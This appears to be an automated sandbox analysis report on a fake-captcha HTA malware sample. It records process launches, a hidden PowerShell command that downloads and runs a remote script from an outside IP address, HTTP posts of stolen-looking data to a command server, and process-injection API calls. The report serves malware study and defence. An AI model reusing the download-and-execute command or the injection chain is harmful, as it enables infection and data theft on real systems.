                                                                        6192.168.2.449748172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:28 UTC284OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=T3IXJXPW7E9RKTS2P7E
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 583787
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 33 49 58 4a 58 50 57 37 45 39 52 4b 54 53 32 50 37 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 55 6b 67 4c 76 2d 2d 6f 74
                                                                        Data Ascii: --T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="hwid"2AA6A2C71324A32B23D904AF30EFEBBC--T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="pid"1--T3IXJXPW7E9RKTS2P7EContent-Disposition: form-data; name="lid"DUkgLv--ot
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 6c 17 ae cd d7 d3 b5 53 da 7d 5b 36 f6 3d 6b 58 2c 3c 16 18 a1 c2 87 b8 49 14 9e 04 cd 16 ca 52 a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96
                                                                        Data Ascii: lS}[6=kX,<IR)RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRh
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 99 c6 96 eb eb 05 82 c0 26 d3 d4 8a 8d 33 62 59 df 43 5c 93 00 df c6 f2 15 4f 88 cc 01 0a 93 00 b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de
                                                                        Data Ascii: &3bYC\O('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 36 93 9e 9e 71 4d 84 f9 9b 5c 92 6c 98 c2 f3 3d 30 40 90 52 a1 26 50 2c d4 2c 1a db 50 77 05 65 a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf
                                                                        Data Ascii: 6qM\l=0@R&P,,Pwe\^_wN0 E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBN
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 79 fd c0 4d 68 c6 a2 78 f2 eb b0 18 28 a9 f1 10 e4 1c c8 15 ae d7 01 5e 6a f5 b3 9c 0b 5b 29 07 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db
                                                                        Data Ascii: yMhx(^j[):Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: f7 38 72 1c 26 06 15 e2 c3 1d c1 ea e2 f1 f8 27 a8 d0 0e a3 e3 31 67 0f 9e a3 2f 16 78 73 b3 c7 e2 e7 89 f5 d1 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6
                                                                        Data Ascii: 8r&'1g/xs.C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 03 4e c4 6c 99 3d 9e 1d c5 ee ab 43 ea d5 bd f4 15 ad 77 08 2b ab 97 f5 9a ad 4c 39 9a e4 ce 3d 2a c6 7b 85 0f 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0
                                                                        Data Ascii: Nl=Cw+L9=*{NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 24 30 eb 77 69 c3 b2 3d 59 f1 c9 e1 fd 46 b7 01 d3 91 41 20 ad a8 78 e3 ef 84 a6 6e 31 e2 a5 9d f7 40 f4 0c 2b 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16
                                                                        Data Ascii: $0wi=YFA xn1@+ux5+Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 0c 51 2c 28 71 f4 67 b2 f4 a8 ef 80 52 ef 6a b3 ae bf 59 90 87 5f 0f 55 82 b2 5b 9a 47 69 43 e7 a1 1c 1a 12 b4 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f
                                                                        Data Ascii: Q,(qgRjY_U[GiC($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuV
                                                                        2024-12-12 06:52:28 UTC15331OUTData Raw: 22 40 68 68 9a 78 a1 7c e2 f4 f5 e2 91 7e ff 24 8e 02 a5 34 57 b9 31 c1 c3 30 87 bf 99 cf 2a cb d1 57 61 35 87 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8
                                                                        Data Ascii: "@hhx|~$4W10*Wa5=t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC
                                                                        2024-12-12 06:52:32 UTC1021INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=tgspmb9ck8fiq0qb9o2sar4q4v; expires=Mon, 07-Apr-2025 00:39:10 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPN%2Bc4ZhbtgyX4TTFpOACp0EkCO9trHYqjDfRtul90a2fotxHh5nRmmStCHmn3DXg854zTanWoEZ1mEa6fR0htdjqS%2Bvu%2BrBXTFvkeEQsBUxo5aXiqNIljWK7P%2B%2FFVJd5fiV"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcab7bac6c336-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1441&min_rtt=1431&rtt_var=556&sent=353&recv=605&lost=0&retrans=0&sent_bytes=2842&recv_bytes=586379&delivery_rate=1932495&cwnd=244&unsent_bytes=0&cid=eb0690af9023d959&ts=3658&x=0"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449750172.67.206.644437184C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 06:52:33 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 82
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:33 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 26 6a 3d 26 68 77 69 64 3d 32 41 41 36 41 32 43 37 31 33 32 34 41 33 32 42 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                        Data Ascii: act=get_message&ver=4.0&lid=DUkgLv--otdel&j=&hwid=2AA6A2C71324A32B23D904AF30EFEBBC
                                                                        2024-12-12 06:52:34 UTC1009INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=vqoagqtr9f6qcro6a9re968fbf; expires=Mon, 07-Apr-2025 00:39:13 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukFsws0pMHI2aSQQ8egw8mkH2jB%2BLpTjR7OX2HYwJ8%2BuvYIX6ej1mM2H4sbjjmb62Zwi0X7MMDdgK53iLhp3J43QgUvGQyCnVOIHsCfVkdyR7WaaDiPeJ7P12KYgA59jaFM%2F"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bcad6c9647d26-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1805&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=982&delivery_rate=1590413&cwnd=194&unsent_bytes=0&cid=ad7de43d37748398&ts=825&x=0"
                                                                        2024-12-12 06:52:34 UTC54INData Raw: 33 30 0d 0a 64 67 7a 68 37 6c 5a 48 31 65 4b 64 36 65 62 64 4a 36 2f 51 77 7a 6c 45 54 2f 63 7a 70 45 2f 62 49 76 7a 43 57 7a 50 4e 44 72 34 74 55 51 3d 3d 0d 0a
                                                                        Data Ascii: 30dgzh7lZH1eKd6ebdJ6/QwzlET/czpE/bIvzCWzPNDr4tUQ==
                                                                        2024-12-12 06:52:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:01:52:01
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:mshta.exe "C:\Users\user\Desktop\Captcha.hta"
                                                                        Imagebase:0xa10000
                                                                        File size:13'312 bytes
                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
                                                                        Imagebase:0x790000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:01:52:02
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:4
                                                                        Start time:01:52:04
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
                                                                        Imagebase:0x7e0000
                                                                        File size:2'141'552 bytes
                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
                                                                        Imagebase:0x7e0000
                                                                        File size:2'141'552 bytes
                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"
                                                                        Imagebase:0x3d0000
                                                                        File size:46'832 bytes
                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                                        Imagebase:0x790000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 05EF0FE7 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1673889747.0000000005EF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_5ef0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction ID: 8167e0c1ddc72042953040531fd22ce99933a0980330daacfc42f833c480f54a
                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 05EF0FDF Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1673889747.0000000005EF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_5ef0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction ID: 8167e0c1ddc72042953040531fd22ce99933a0980330daacfc42f833c480f54a
                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction Fuzzy Hash:

                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:36.8%
                                                                          Total number of Nodes:19
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 9688 4ee7cc0 9690 4ee7cd8 9688->9690 9689 4ee7d5e 9690->9689 9691 4ee89c0 Wow64SetThreadContext 9690->9691 9692 4ee8b59 WriteProcessMemory 9690->9692 9693 4ee8b60 WriteProcessMemory 9690->9693 9698 4ee89c8 Wow64SetThreadContext 9690->9698 9699 4ee91e8 9690->9699 9703 4ee8dd4 9690->9703 9707 4ee8918 9690->9707 9711 4ee8910 9690->9711 9691->9690 9692->9690 9693->9690 9698->9690 9700 4ee91eb CreateProcessA 9699->9700 9702 4ee9433 9700->9702 9704 4ee8ddd CreateProcessA 9703->9704 9706 4ee9433 9704->9706 9708 4ee891b ResumeThread 9707->9708 9710 4ee8989 9708->9710 9710->9690 9712 4ee8914 ResumeThread 9711->9712 9714 4ee8989 9712->9714 9714->9690

                                                                          Executed Functions

                                                                          Function 04EE7CC0 Relevance: .4, Instructions: 436COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
